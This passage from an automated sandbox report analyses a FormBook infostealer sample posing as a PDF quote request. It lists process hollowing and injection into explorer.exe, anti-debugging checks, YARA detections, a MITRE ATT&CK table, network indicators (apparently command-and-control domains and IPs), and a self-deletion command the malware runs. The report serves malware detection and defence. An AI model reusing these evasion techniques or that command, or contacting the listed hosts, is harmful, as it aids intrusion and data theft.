          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]7_2_04792D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]7_2_04792D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]7_2_047C2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]7_2_047C2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]7_2_047C2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]7_2_047C2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482FE87 mov eax, dword ptr fs:[00000030h]7_2_0482FE87
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]7_2_047BAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]7_2_047BAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]7_2_047BAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]7_2_047BAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]7_2_047BAE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A766D mov eax, dword ptr fs:[00000030h]7_2_047A766D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]7_2_04860EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]7_2_04860EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]7_2_04860EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048146A7 mov eax, dword ptr fs:[00000030h]7_2_048146A7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]7_2_047A7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]7_2_047A7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]7_2_047A7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]7_2_047A7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]7_2_047A7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]7_2_047A7E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0484FEC0 mov eax, dword ptr fs:[00000030h]7_2_0484FEC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868ED6 mov eax, dword ptr fs:[00000030h]7_2_04868ED6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479E620 mov eax, dword ptr fs:[00000030h]7_2_0479E620
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h]7_2_047CA61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h]7_2_047CA61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]7_2_0479C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]7_2_0479C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]7_2_0479C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C8E00 mov eax, dword ptr fs:[00000030h]7_2_047C8E00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851608 mov eax, dword ptr fs:[00000030h]7_2_04851608
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A76E2 mov eax, dword ptr fs:[00000030h]7_2_047A76E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C16E0 mov ecx, dword ptr fs:[00000030h]7_2_047C16E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C36CC mov eax, dword ptr fs:[00000030h]7_2_047C36CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D8EC7 mov eax, dword ptr fs:[00000030h]7_2_047D8EC7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0484FE3F mov eax, dword ptr fs:[00000030h]7_2_0484FE3F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h]7_2_0485AE44
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h]7_2_0485AE44
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]7_2_04817794
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]7_2_04817794
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]7_2_04817794
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AFF60 mov eax, dword ptr fs:[00000030h]7_2_047AFF60
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AEF40 mov eax, dword ptr fs:[00000030h]7_2_047AEF40
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CE730 mov eax, dword ptr fs:[00000030h]7_2_047CE730
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h]7_2_04794F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h]7_2_04794F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BF716 mov eax, dword ptr fs:[00000030h]7_2_047BF716
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h]7_2_047CA70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h]7_2_047CA70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D37F5 mov eax, dword ptr fs:[00000030h]7_2_047D37F5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486070D mov eax, dword ptr fs:[00000030h]7_2_0486070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486070D mov eax, dword ptr fs:[00000030h]7_2_0486070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h]7_2_0482FF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h]7_2_0482FF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868F6A mov eax, dword ptr fs:[00000030h]7_2_04868F6A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A8794 mov eax, dword ptr fs:[00000030h]7_2_047A8794
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04813884 mov eax, dword ptr fs:[00000030h]7_2_04813884
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04813884 mov eax, dword ptr fs:[00000030h]7_2_04813884
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h]7_2_047B0050
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h]7_2_047B0050
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]7_2_047AB02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]7_2_047AB02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]7_2_047AB02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]7_2_047AB02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]7_2_047C002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]7_2_047C002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]7_2_047C002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]7_2_047C002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]7_2_047C002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]7_2_0482B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0482B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]7_2_0482B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]7_2_0482B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]7_2_0482B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]7_2_0482B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04864015 mov eax, dword ptr fs:[00000030h]7_2_04864015
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04864015 mov eax, dword ptr fs:[00000030h]7_2_04864015
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047958EC mov eax, dword ptr fs:[00000030h]7_2_047958EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]7_2_04817016
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]7_2_04817016
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]7_2_04817016
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]7_2_047940E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]7_2_047940E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]7_2_047940E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CF0BF mov ecx, dword ptr fs:[00000030h]7_2_047CF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h]7_2_047CF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h]7_2_047CF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D90AF mov eax, dword ptr fs:[00000030h]7_2_047D90AF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04861074 mov eax, dword ptr fs:[00000030h]7_2_04861074
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04852073 mov eax, dword ptr fs:[00000030h]7_2_04852073
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799080 mov eax, dword ptr fs:[00000030h]7_2_04799080
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h]7_2_0479B171
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h]7_2_0479B171
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479C962 mov eax, dword ptr fs:[00000030h]7_2_0479C962
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048169A6 mov eax, dword ptr fs:[00000030h]7_2_048169A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h]7_2_047BB944
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h]7_2_047BB944
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]7_2_048151BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]7_2_048151BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]7_2_048151BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]7_2_048151BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C513A mov eax, dword ptr fs:[00000030h]7_2_047C513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C513A mov eax, dword ptr fs:[00000030h]7_2_047C513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov ecx, dword ptr fs:[00000030h]7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048241E8 mov eax, dword ptr fs:[00000030h]7_2_048241E8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]7_2_04799100
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]7_2_04799100
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]7_2_04799100
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]7_2_0479B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]7_2_0479B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]7_2_0479B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h]7_2_047C61A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h]7_2_047C61A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2990 mov eax, dword ptr fs:[00000030h]7_2_047C2990
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BC182 mov eax, dword ptr fs:[00000030h]7_2_047BC182
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA185 mov eax, dword ptr fs:[00000030h]7_2_047CA185
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D927A mov eax, dword ptr fs:[00000030h]7_2_047D927A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]7_2_04799240
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]7_2_04799240
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]7_2_04799240
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]7_2_04799240
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h]7_2_047D4A2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h]7_2_047D4A2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B3A1C mov eax, dword ptr fs:[00000030h]7_2_047B3A1C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]7_2_04795210
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04795210 mov ecx, dword ptr fs:[00000030h]7_2_04795210
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]7_2_04795210
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]7_2_04795210
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h]7_2_0479AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h]7_2_0479AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A8A0A mov eax, dword ptr fs:[00000030h]7_2_047A8A0A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.rootedwithlovejax.com
          Source: C:\Windows\explorer.exeDomain query: www.essentials-trading.com
          Source: C:\Windows\explorer.exeDomain query: www.coloradocouponclub.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.178.142.156 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tennesseewheelrepair.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.244.61 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.quickeasybites.com
          Source: C:\Windows\explorer.exeDomain query: www.ssfgasia.com
          Source: C:\Windows\explorer.exeDomain query: www.hzmsbg.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.161.160 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 216.239.36.21 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.kf350.com
          Source: C:\Windows\explorer.exeDomain query: www.1364kensington.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.desertfoxindustries.com
          Source: C:\Windows\explorer.exeDomain query: www.pierresplayhouse.com
          Source: C:\Windows\explorer.exeDomain query: www.thecapitalhut.com
          Source: C:\Windows\explorer.exeDomain query: www.luegomusic.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_72AD1000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeSection loaded: unknown target: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: E70000Jump to behavior
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000002.909699589.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.669092694.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.671246552.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery241Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
